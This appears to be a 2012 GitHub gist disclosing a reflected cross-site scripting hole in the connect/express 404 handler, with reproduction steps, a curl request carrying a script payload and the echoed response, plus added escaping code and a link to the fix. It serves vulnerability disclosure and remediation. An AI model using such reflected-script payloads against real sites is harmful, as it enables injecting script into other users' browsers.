@s3u
Created February 11, 2012 00:41
connect XSS hole

Run a sample app

git clone https://github.com/visionmedia/express.git
cd express
npm install
node examples/ejs/index.js

Then try this

curl -v -k "http://localhost:3000/no5_such3_file7.pl?\"><script>alert(73541);</script>"

The server returns

Cannot GET /no5_such3_file7.pl?"><script>alert(73541);</script>
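
The reflection shown above next to an escaped fallback handler, as an added example that is not part of the original gist and is not connect's own code. All function names are hypothetical, and the sample request target is the one from the curl command.

```javascript
// Added illustration: hypothetical names, not connect's implementation.

// Escape the characters that are significant in HTML text and attributes.
// '&' goes first so the entities produced below are not escaped twice.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Behaviour shown in the gist: method and URL are echoed verbatim.
function notFoundBodyRaw(method, url) {
  return 'Cannot ' + method + ' ' + url;
}

// Hardened: request-derived values are escaped before reaching the body.
function notFoundBodyEscaped(method, url) {
  return 'Cannot ' + escapeHtml(method) + ' ' + escapeHtml(url);
}

// Fallback 404 handler with Node's (req, res) shape. Besides escaping, it
// declares a non-HTML type and disables content sniffing as a second layer.
function notFound(req, res) {
  const body = notFoundBodyEscaped(req.method, req.url);
  res.writeHead(404, {
    'Content-Type': 'text/plain; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Content-Length': Buffer.byteLength(body)
  });
  res.end(body);
}

// Run a handler against a stub response and return what it would send.
function simulate(handler, method, url) {
  const out = {};
  handler({ method, url }, {
    writeHead(status, headers) { out.status = status; out.headers = headers; },
    end(body) { out.body = body; }
  });
  return out;
}

// Constructed sample: the request target from the curl command above.
const SAMPLE_URL = '/no5_such3_file7.pl?"><script>alert(73541);</script>';

console.log(notFoundBodyRaw('GET', SAMPLE_URL));
console.log(simulate(notFound, 'GET', SAMPLE_URL));
```
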
s3u commented Feb 14, 2012

Here is the pull request for connect - senchalabs/connect#473